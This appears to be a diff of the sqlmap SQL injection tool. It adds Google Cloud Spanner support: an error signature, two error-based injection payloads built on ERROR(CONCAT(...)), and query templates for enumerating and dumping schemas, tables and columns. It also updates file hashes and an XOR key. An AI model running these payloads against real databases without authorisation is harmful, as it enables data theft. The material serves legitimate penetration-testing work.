b13462712ec5ac07541dba98631ddcda279d210b838f363d15ac97a1413b67a2 lib/core/bigarray.py
|
||||
3b2ca69b7a2e07f6db2fed2651c19e401f62e2068ea3b5f8f96ebf0ff067f349 lib/core/common.py
|
||||
c265eb478d912aba53ebd1d93de2646a7738b7a0e621a2c38a35f0ba897d3db6 lib/core/common.py
|
||||
a6397b10de7ae7c56ed6b0fa3b3c58eb7a9dbede61bf93d786e73258175c981e lib/core/compat.py
|
||||
a9997e97ebe88e0bf7efcf21e878bc5f62c72348e5aba18f64d6861390a4dcf2 lib/core/convert.py
|
||||
461f2666d500f9a91210fec558e6ee68af61c752de5498490bc96c11b32a6b0a lib/core/convert.py
|
||||
c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6 lib/core/data.py
|
||||
ca06a0e9d66a58e74ef994d53f9b3cd2ebaed98735bbab99854054235a8083d6 lib/core/datatype.py
|
||||
6acb645b1f285b21673c70824b03f6209acc5993b50e50da5ed2c713a30626f5 lib/core/datatype.py
|
||||
70fb2528e580b22564899595b0dff6b1bc257c6a99d2022ce3996a3d04e68e4e lib/core/decorators.py
|
||||
147823c37596bd6a56d677697781f34b8d1d1671d5a2518fbc9468d623c6d07d lib/core/defaults.py
|
||||
6b366f897e66b9df39df2ee45fef77d46efb7a2d4e294440d3aa7dc1b2f4cedf lib/core/dicts.py
|
||||
a033f92d136c707a25927c2383125ddb004d4283db62c004dcd67c3fc242bb1c lib/core/dump.py
|
||||
1abf1edeacb85eaf5cffd35fcbde4eee2da6f5fc722a8dc1f9287fb55d138418 lib/core/enums.py
|
||||
2f44a1bfe6f18aafe64147b99e69aa93cf438c0e7befe59f4e2aee9065c8b7b6 lib/core/dicts.py
|
||||
ccd3b414727ef75f5d533f9518198b61322781f3ee53a86643763e029b2874c0 lib/core/dump.py
|
||||
23e33f0b457e2a7114c9171ba9b42e1751b71ee3f384bba7fad39e4490adb803 lib/core/enums.py
|
||||
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
|
||||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
|
||||
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
|
||||
02a2264324caa249154e024a01bcd7cc40dbca4d647d5d10a50654b4415a6d77 lib/core/optiondict.py
|
||||
c1cb56f2a43e9f2f6b25d5f3d504e856ea21df6fc14af5e37b1000feef2bdb5a lib/core/option.py
|
||||
8171f6ee33e7742f06bb3014a28324496374beddee7b378ace10a26414a97762 lib/core/patch.py
|
||||
67ea32c993cbf23cdbd5170360c020ca33363b7c516ff3f8da4124ef7cb0254d lib/core/optiondict.py
|
||||
d197388e8e2aabe19f2529bfcac780e18e22a905d01319080d7afe4cb2b1c4c9 lib/core/option.py
|
||||
789320dcb3f93137d3065080ee98429280bf10b20b66a1c08d3fcc1747b30d94 lib/core/patch.py
|
||||
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
|
||||
03db48f02c3d07a047ddb8fe33a757b6238867352d8ddda2a83e4fec09a98d04 lib/core/readlineng.py
|
||||
48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py
|
||||
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
|
||||
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
|
||||
bf818add365e18e378b15fb33db123d846acddc2969e05af52eacfe745cc335e lib/core/settings.py
|
||||
399d2fb45efa471982eb1d43e4dfc8a965fbca2165f484e73c68071eebdbf267 lib/core/settings.py
|
||||
cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py
|
||||
bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py
|
||||
d35650179816193164a5f177102f18379dfbe6bb6d40fbb67b78d907b41c8038 lib/core/target.py
|
||||
ddf8c5a3dbebd6cdf8b8ba4417e36652d1e040f025175cb6487f1aebc0208836 lib/core/testing.py
|
||||
70ea3768f1b3062b22d20644df41c86238157ec80dd43da40545c620714273c6 lib/core/target.py
|
||||
7f7d1c57917f6ccc98e2ef093e2fa4cb6424d904c772b61003d5a5a3482a848f lib/core/testing.py
|
||||
b5b65f018d6ef4b1ceeebbc50d372e07d4733267c9f3f4b13062efd065e847b6 lib/core/threads.py
|
||||
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
|
||||
10719f5ca450610ad28242017b2d8a77354ca357ffa26948c5f62d20cac29a8b lib/core/update.py
|
||||
ec11fd5a3f4efd10a1cae288157ac6eb6fb75da4666d76d19f6adf74ac338b5a lib/core/wordlist.py
|
||||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
|
||||
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
|
||||
a9f10a558684778bdb00d446cb88967fc1bfd413ae6a5f4bd582b3ea442baa87 lib/parse/cmdline.py
|
||||
4c56ad26ffb893d37813167de172b6c95c120588bfdc899f102977a2997b9bb9 lib/parse/cmdline.py
|
||||
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
|
||||
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
|
||||
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
|
||||
1ad9054cd8476a520d4e2c141085ae45d94519df5c66f25fac41fe7d552ab952 lib/parse/html.py
|
||||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/parse/__init__.py
|
||||
d2e771cdacef25ee3fdc0e0355b92e7cd1b68f5edc2756ffc19f75d183ba2c73 lib/parse/payloads.py
|
||||
80d26a30abe948faf817a14f746cc8b3e2341ea8286830cccaae253b8ac0cdff lib/parse/sitemap.py
|
||||
455ab0ec63e55cd56ce4a884b85bdc089223155008cab0f3696da5a33118f95b lib/parse/sitemap.py
|
||||
1be3da334411657461421b8a26a0f2ff28e1af1e28f1e963c6c92768f9b0847c lib/request/basicauthhandler.py
|
||||
a1c638493ecdc5194db7186bbfed815c6eed2344f2607cac8c9fa50534824266 lib/request/basic.py
|
||||
1d5972aba14e4e340e3dde4f1d39a671020187fb759f435ba8b7f522dd4498fa lib/request/basic.py
|
||||
bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e lib/request/chunkedhandler.py
|
||||
2daf0ce19eacda64687f441c90ef8da51714c3e8947c993ba08fb4ecdc4f5287 lib/request/comparison.py
|
||||
f83140c85be7f572f83c4ab4279fa1d8601243210cdfe4a44b2fc218befbcffd lib/request/connect.py
|
||||
09c2d8786fb5280f5f14a7b4345ecb2e7c2ca836ee06a6cf9b51770df923d94c lib/request/comparison.py
|
||||
86bfe2cef8d3fcdbadf3adc427f593ec638cf8953a37c68dd17691741bf9a950 lib/request/connect.py
|
||||
8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498 lib/request/direct.py
|
||||
cf019248253a5d7edb7bc474aa020b9e8625d73008a463c56ba2b539d7f2d8ec lib/request/dns.py
|
||||
f56fc33251bd6214e3a6316c8f843eb192b2996aa84bd4c3e98790fdcf6e8cf0 lib/request/httpshandler.py
|
||||
92c81cc31ff4a396723242058fb2152c9e9745f8412d01ea74480b048a53af6c lib/request/httpshandler.py
|
||||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/request/__init__.py
|
||||
aeeeb5f0148078e30d52208184042efc3618d3f2e840d7221897aae34315824e lib/request/inject.py
|
||||
ada4d305d6ce441f79e52ec3f2fc23869ee2fa87c017723e8f3ed0dfa61cdab4 lib/request/methodrequest.py
|
||||
|
|
@ -240,15 +240,15 @@ f552b6140d4069be6a44792a08f295da8adabc1c4bb6a5e100f222f87144ca9d lib/techniques
|
|||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
|
||||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
|
||||
30cae858e2a5a75b40854399f65ad074e6bb808d56d5ee66b94d4002dc6e101b lib/techniques/union/test.py
|
||||
a17c1d201bd084de0093254bcd303aa859399891de13a7259e8c200e98294efb lib/techniques/union/use.py
|
||||
67dff80a17503b91c8ff93788ccc037b6695aa18b0793894b42488cbb21c4c83 lib/utils/api.py
|
||||
a8a795f29ec6fd66482926f04b054ed492a033982c3b7837c5d2ea32368acec0 lib/techniques/union/use.py
|
||||
f64f2e9df844061ff0b7b97907ac959e6e03c0eda4cbb273145985b90adc081d lib/utils/api.py
|
||||
ea5e14f8c9d74b0fb17026b14e3fb70ee90e4046e51ab2c16652d86b3ca9b949 lib/utils/brute.py
|
||||
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py
|
||||
a94958be0ec3e9d28d8171813a6a90655a9ad7e6aa33c661e8d8ebbfcf208dbb lib/utils/deps.py
|
||||
51cfab194cd5b6b24d62706fb79db86c852b9e593f4c55c15b35f175e70c9d75 lib/utils/getch.py
|
||||
853c3595e1d2efc54b8bfb6ab12c55d1efc1603be266978e3a7d96d553d91a52 lib/utils/gui.py
|
||||
366e6fd5356fae7e3f2467c070d064b6695be80b50f1530ea3c01e86569b58b2 lib/utils/har.py
|
||||
a1a1ccd5ec29a6a884cfa8264d4e0f7e0b6a0760c692eb402805f926da41e6ee lib/utils/hashdb.py
|
||||
e890d2ee4787589b2464d9c561d10a6896546781c349b48bfe4d42dd3954468b lib/utils/hashdb.py
|
||||
84bf572a9e7915e91dbffea996e1a7b749392725f1ad7f412d0ff48c636a2896 lib/utils/hash.py
|
||||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/utils/__init__.py
|
||||
22ba65391b0a73b1925e5becf8ddab6ba73a196d86e351a2263509aad6676bd7 lib/utils/pivotdumptable.py
|
||||
|
|
@ -326,7 +326,7 @@ c11430510e18ff1eec0d6e29fc308e540bbd7e925c60af4cd19930a726c56b74 plugins/dbms/e
|
|||
7d2dc7c31c60dc631f2c49d478a4ddeb6b8e08b93ad5257d5b0df4b9a57ed807 plugins/dbms/extremedb/__init__.py
|
||||
4878e83ef8e33915412f2fac17d92f1b1f6f18b47d31500cd93e59d68f8b5752 plugins/dbms/extremedb/syntax.py
|
||||
e05577e2e85be5e0d9060062511accbb7b113dfbafa30c80a0f539c9e4593c9f plugins/dbms/extremedb/takeover.py
|
||||
5a5ab2661aea9e75795836f0e2f3143453dfcc57fa9b42a999349055e472d6ea plugins/dbms/firebird/connector.py
|
||||
368cac0cb766e0a4b4850f41c3c2049244d832f9f75218270b526a3785e94ee7 plugins/dbms/firebird/connector.py
|
||||
813ccc7b1b78a78079389a37cc67aa91659aa45b5ddd7b124a922556cdafc461 plugins/dbms/firebird/enumeration.py
|
||||
5becd41639bb2e12abeda33a950d777137b0794161056fb7626e5e07ab80461f plugins/dbms/firebird/filesystem.py
|
||||
f560172d8306ca135de82cf1cd22a20014ce95da8b33a28d698dd1dcd3dad4b0 plugins/dbms/firebird/fingerprint.py
|
||||
|
|
@ -439,6 +439,13 @@ b76606fe4dee18467bc0d19af1e6ab38c0b5593c6c0f2068a8d4c664d4bd71d8 plugins/dbms/r
|
|||
1de7c93b445deb0766c314066cb122535e9982408614b0ff952a97cbae9b813a plugins/dbms/snowflake/__init__.py
|
||||
859cc5b9be496fe35f2782743f8e573ff9d823de7e99b0d32dbc250c361c653e plugins/dbms/snowflake/syntax.py
|
||||
da43fed8bfa4a94aaceb63e760c69e9927c1640e45e457b8f03189be6604693f plugins/dbms/snowflake/takeover.py
|
||||
0163ce14bfa49b7485ab430be1fa33366c9f516573a89d89120f812ffdbc0c83 plugins/dbms/spanner/connector.py
|
||||
cb2c802d695d0b3bdc0769a2f767e58351c73a900db2ddb8f89f863bd5546947 plugins/dbms/spanner/enumeration.py
|
||||
672dc9b3d291aa4f5d6c4cbe364e92b92e19ee6de86f6d9b9a4dda7d5611b409 plugins/dbms/spanner/filesystem.py
|
||||
30f4caea09eb300a8b16ff2609960d165d8a7fa0f3034c345fea24002fea2670 plugins/dbms/spanner/fingerprint.py
|
||||
7c46a84ece581b5284ffd604b54bacb38acc87ea7fbac31aae38e20eb4ead31a plugins/dbms/spanner/__init__.py
|
||||
54a184528a74d7e1ff3131cbca2efa86bbf63c2b2623fb9a395bdb5d2db6cf5a plugins/dbms/spanner/syntax.py
|
||||
949add058f3774fbed41a6a724985ac902abe03b0617ec99698e3a29292efa43 plugins/dbms/spanner/takeover.py
|
||||
cae01d387617e3986b9cfb23519b7c6a444e2d116f2dc774163abec0217f6ed6 plugins/dbms/sqlite/connector.py
|
||||
fbcff0468fcccd9f86277d205b33f14578b7550b33d31716fd10003f16122752 plugins/dbms/sqlite/enumeration.py
|
||||
013f6cf4d04edce3ee0ede73b6415a2774e58452a5365ab5f7a49c77650ba355 plugins/dbms/sqlite/filesystem.py
|
||||
|
|
@ -469,8 +476,8 @@ e2e20e4707abe9ed8b6208837332d2daa4eaca282f847412063f2484dcca8fbd plugins/dbms/v
|
|||
2b2dad6ba1d344215cad11b629546eb9f259d7c996c202edf3de5ab22418787e plugins/dbms/virtuoso/takeover.py
|
||||
51c44048e4b335b306f8ed1323fd78ad6935a8c0d6e9d6efe195a9a5a24e46dc plugins/generic/connector.py
|
||||
a967f4ebd101c68a5dcc10ff18c882a8f44a5c3bf06613d951a739ecc3abb9b3 plugins/generic/custom.py
|
||||
c091caecc93c01e17fa5432101555cae824492c060b9b7ee35cb49a211365076 plugins/generic/databases.py
|
||||
4050f9dfa8a2f8dbe6ae75f91d71b3d1fa3a4b1bd28404c4a346d5a83ad512df plugins/generic/entries.py
|
||||
37351d6fb7418e3659bec5c9a6f9f181a606deae74d3bc9fb8c97f495449471f plugins/generic/databases.py
|
||||
a82834adfe09cd73d69fd954047e09dddcc6c63183994499ce134e27b56e2321 plugins/generic/entries.py
|
||||
d2de7fc135cf0db3eb4ac4a509c23ebec5250a5d8043face7f8c546a09f301b5 plugins/generic/enumeration.py
|
||||
a02ac4ebc1cc488a2aa5ae07e6d0c3d5064e99ded7fd529dfa073735692f11df plugins/generic/filesystem.py
|
||||
efd7177218288f32881b69a7ba3d667dc9178f1009c06a3e1dd4f4a4ee6980db plugins/generic/fingerprint.py
|
||||
|
|
@ -478,13 +485,13 @@ efd7177218288f32881b69a7ba3d667dc9178f1009c06a3e1dd4f4a4ee6980db plugins/generi
|
|||
ba07e54265cf461aed678df49fe3550aec90cb6d8aa9387458bd4b7064670d00 plugins/generic/misc.py
|
||||
7c1b1f91925d00706529e88a763bc3dabafaf82d6dbc01b1f74aeef0533537a1 plugins/generic/search.py
|
||||
da8cc80a09683c89e8168a27427efecda9f35abc4a23d4facd6ffa7a837015c4 plugins/generic/syntax.py
|
||||
eb45fd711efa71ab9d91d815cc8abebc9abc4770311fbb827159008b000f4fc2 plugins/generic/takeover.py
|
||||
cedf45d33461bd7e5400d06611a63c8a4ffae1a4510030c5696b9d46ed6a9883 plugins/generic/takeover.py
|
||||
45bfd00f09557e20115e6ce7fb52ff507930d705db215e535f991e5fbf7464de plugins/generic/users.py
|
||||
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 plugins/__init__.py
|
||||
423d9bfaddb3cf527d02ddda97e53c4853d664c51ef7be519e4f45b9e399bc30 README.md
|
||||
c6ad39bfd1810413402dedfc275fc805fa13f85fc490e236c1e725bde4e5100b sqlmapapi.py
|
||||
4e993cfe2889bf0f86ad0abafd9a6a25849580284ea279b2115e99707e14bb97 sqlmapapi.yaml
|
||||
a40607ce164eb2d21865288d24b863edb1c734b56db857e130ac1aef961c80b9 sqlmap.conf
|
||||
627d90f1194335b800cbc9cc78db6697cf9e02e193a83598e0d4d0abb55b63b8 sqlmap.conf
|
||||
4cec2aae8d65d67cd6db60f00217aa05ab449345ed3a38e04697b85b53d755f1 sqlmap.py
|
||||
eb37a88357522fd7ad00d90cdc5da6b57442b4fec49366aadb2944c4fbf8b804 tamper/0eunion.py
|
||||
a9785a4c111d6fee2e6d26466ba5efb3b229c00520b26e8024b041553b53efba tamper/apostrophemask.py
|
||||
|
|
@ -618,7 +625,7 @@ edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa thirdparty/ide
|
|||
d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347 thirdparty/identywaf/LICENSE
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/__init__.py
|
||||
879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8 thirdparty/keepalive/__init__.py
|
||||
c7ac7253fa450030f9c42f11bb19689055bb8c39621bcfbeca856ba3c9342760 thirdparty/keepalive/keepalive.py
|
||||
ae394bfae5204dfeffeccc15c356d9bf21708f9e48016681cfb8040ff8857998 thirdparty/keepalive/keepalive.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/magic/__init__.py
|
||||
4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8 thirdparty/magic/magic.py
|
||||
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/multipart/__init__.py
|
||||
|
|
|
|||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
|
@ -245,4 +245,8 @@
|
|||
<error regexp="000904 \(42000\):"/>
|
||||
<error regexp="SQL compilation error: (syntax )?error line \d+ at position \d+"/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="Spanner">
|
||||
<error regexp="type.googleapis.com/zetasql.ErrorMessageModeForPayload"/>
|
||||
</dbms>
|
||||
</root>
|
||||
|
|
|
|||
|
|
@ -911,6 +911,43 @@
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Spanner AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,8,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND ERROR(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) IS NOT NULL</vector>
|
||||
<request>
|
||||
<payload>AND ERROR(CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')) IS NOT NULL</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Spanner</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Spanner OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3,8,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR ERROR(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) IS NOT NULL</vector>
|
||||
<request>
|
||||
<payload>OR ERROR(CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')) IS NOT NULL</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Spanner</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!--
|
||||
TODO: if possible, add payload for SQLite, Microsoft Access,
|
||||
and SAP MaxDB - no known techniques at this time
|
||||
|
|
|
|||
|
|
@ -1843,4 +1843,67 @@
|
|||
<search_table/>
|
||||
<search_column/>
|
||||
</dbms>
|
||||
|
||||
<dbms value="Spanner">
|
||||
<cast query="CAST(%s AS STRING)"/>
|
||||
<length query="CHAR_LENGTH(CAST(%s AS STRING))"/>
|
||||
<isnull query="IFNULL(CAST(%s AS STRING),' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" OFFSET "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--" query2="#"/>
|
||||
<substring query="SUBSTR(CAST((%s) AS STRING),%d,%d)"/>
|
||||
<concatenate query="%s||%s"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<hex query="TO_HEX(CAST(%s AS BYTES))"/>
|
||||
<inference query="TO_CODE_POINTS(SUBSTR(CAST((%s) AS STRING),%d,1))[SAFE_OFFSET(0)]>%d"/>
|
||||
<banner query="'Google Cloud Spanner'"/>
|
||||
<current_user/>
|
||||
<current_db/>
|
||||
<hostname/>
|
||||
<table_comment/>
|
||||
<column_comment/>
|
||||
<is_dba/>
|
||||
<users/>
|
||||
<passwords/>
|
||||
<privileges/>
|
||||
<roles/>
|
||||
<statements>
|
||||
<inband query="SELECT text FROM SPANNER_SYS.QUERY_STATS_TOP_MINUTE"/>
|
||||
<blind query="SELECT text FROM SPANNER_SYS.QUERY_STATS_TOP_MINUTE" count="SELECT COUNT(text) FROM SPANNER_SYS.QUERY_STATS_TOP_MINUTE"/>
|
||||
</statements>
|
||||
<dbs>
|
||||
<inband query="SELECT CASE schema_name WHEN '' THEN 'default' ELSE schema_name END FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
<blind query="SELECT CASE schema_name WHEN '' THEN 'default' ELSE schema_name END FROM INFORMATION_SCHEMA.SCHEMATA GROUP BY schema_name ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(DISTINCT schema_name) FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT CASE table_schema WHEN '' THEN 'default' ELSE table_schema END,table_name FROM INFORMATION_SCHEMA.TABLES" condition="table_schema"/>
|
||||
<blind query="SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=CASE '%s' WHEN 'default' THEN '' ELSE '%s' END ORDER BY table_name" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=CASE '%s' WHEN 'default' THEN '' ELSE '%s' END"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT column_name,spanner_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema=CASE '%s' WHEN 'default' THEN '' ELSE '%s' END" condition="column_name"/>
|
||||
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema=CASE '%s' WHEN 'default' THEN '' ELSE '%s' END ORDER BY column_name" query2="SELECT spanner_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema=CASE '%s' WHEN 'default' THEN '' ELSE '%s' END" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema=CASE '%s' WHEN 'default' THEN '' ELSE '%s' END" condition="column_name"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
|
||||
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT 1 OFFSET %d" count="SELECT COUNT(*) FROM %s.%s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
<blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s ORDER BY schema_name" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
</search_db>
|
||||
<search_table>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s ORDER BY table_schema" query2="SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s ORDER BY table_schema" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
</root>
|
||||
|
|
|
|||
|
|
@ -21,7 +21,7 @@ if sys.version_info >= (3, 0):
|
|||
xrange = range
|
||||
ord = lambda _: _
|
||||
|
||||
KEY = b"wr36EPIvaR7ZDfb4"
|
||||
KEY = b"ZCuk6GdHSj4KtgDq"
|
||||
|
||||
def xor(message, key):
|
||||
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
|
||||
|
|
|
|||
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
|
@ -1377,6 +1377,7 @@ def checkWaf():
|
|||
kb.choices.redirect = REDIRECTION.YES
|
||||
kb.resendPostOnRedirect = False
|
||||
conf.timeout = IPS_WAF_CHECK_TIMEOUT
|
||||
kb.checkWafMode = True
|
||||
|
||||
try:
|
||||
retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO
|
||||
|
|
@ -1384,6 +1385,7 @@ def checkWaf():
|
|||
retVal = True
|
||||
finally:
|
||||
kb.matchRatio = None
|
||||
kb.checkWafMode = False
|
||||
|
||||
conf.timeout = popValue()
|
||||
kb.resendPostOnRedirect = popValue()
|
||||
|
|
|
|||
|
|
@ -437,7 +437,7 @@ def start():
|
|||
continue
|
||||
|
||||
if conf.rParam and kb.originalPage:
|
||||
kb.randomPool = dict([_ for _ in kb.randomPool.items() if isinstance(_[1], list)])
|
||||
kb.randomPool = dict(_ for _ in kb.randomPool.items() if isinstance(_[1], list))
|
||||
|
||||
for match in re.finditer(r"(?si)<select[^>]+\bname\s*=\s*[\"']([^\"']+)(.+?)</select>", kb.originalPage):
|
||||
name, _ = match.groups()
|
||||
|
|
|
|||
|
|
@ -42,6 +42,7 @@ from lib.core.settings import SYBASE_ALIASES
|
|||
from lib.core.settings import VERTICA_ALIASES
|
||||
from lib.core.settings import VIRTUOSO_ALIASES
|
||||
from lib.core.settings import SNOWFLAKE_ALIASES
|
||||
from lib.core.settings import SPANNER_ALIASES
|
||||
from lib.utils.sqlalchemy import SQLAlchemy
|
||||
|
||||
from plugins.dbms.access import AccessMap
|
||||
|
|
@ -73,6 +74,7 @@ from plugins.dbms.sybase import SybaseMap
|
|||
from plugins.dbms.vertica import VerticaMap
|
||||
from plugins.dbms.virtuoso import VirtuosoMap
|
||||
from plugins.dbms.snowflake import SnowflakeMap
|
||||
from plugins.dbms.spanner import SpannerMap
|
||||
|
||||
def setHandler():
|
||||
"""
|
||||
|
|
@ -110,6 +112,7 @@ def setHandler():
|
|||
(DBMS.RAIMA, RAIMA_ALIASES, RaimaMap, "plugins.dbms.raima.connector"),
|
||||
(DBMS.VIRTUOSO, VIRTUOSO_ALIASES, VirtuosoMap, "plugins.dbms.virtuoso.connector"),
|
||||
(DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES, SnowflakeMap, "plugins.dbms.snowflake.connector"),
|
||||
(DBMS.SPANNER, SPANNER_ALIASES, SpannerMap, "plugins.dbms.spanner.connector"),
|
||||
]
|
||||
|
||||
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else () for _ in items)
|
||||
|
|
|
|||
|
|
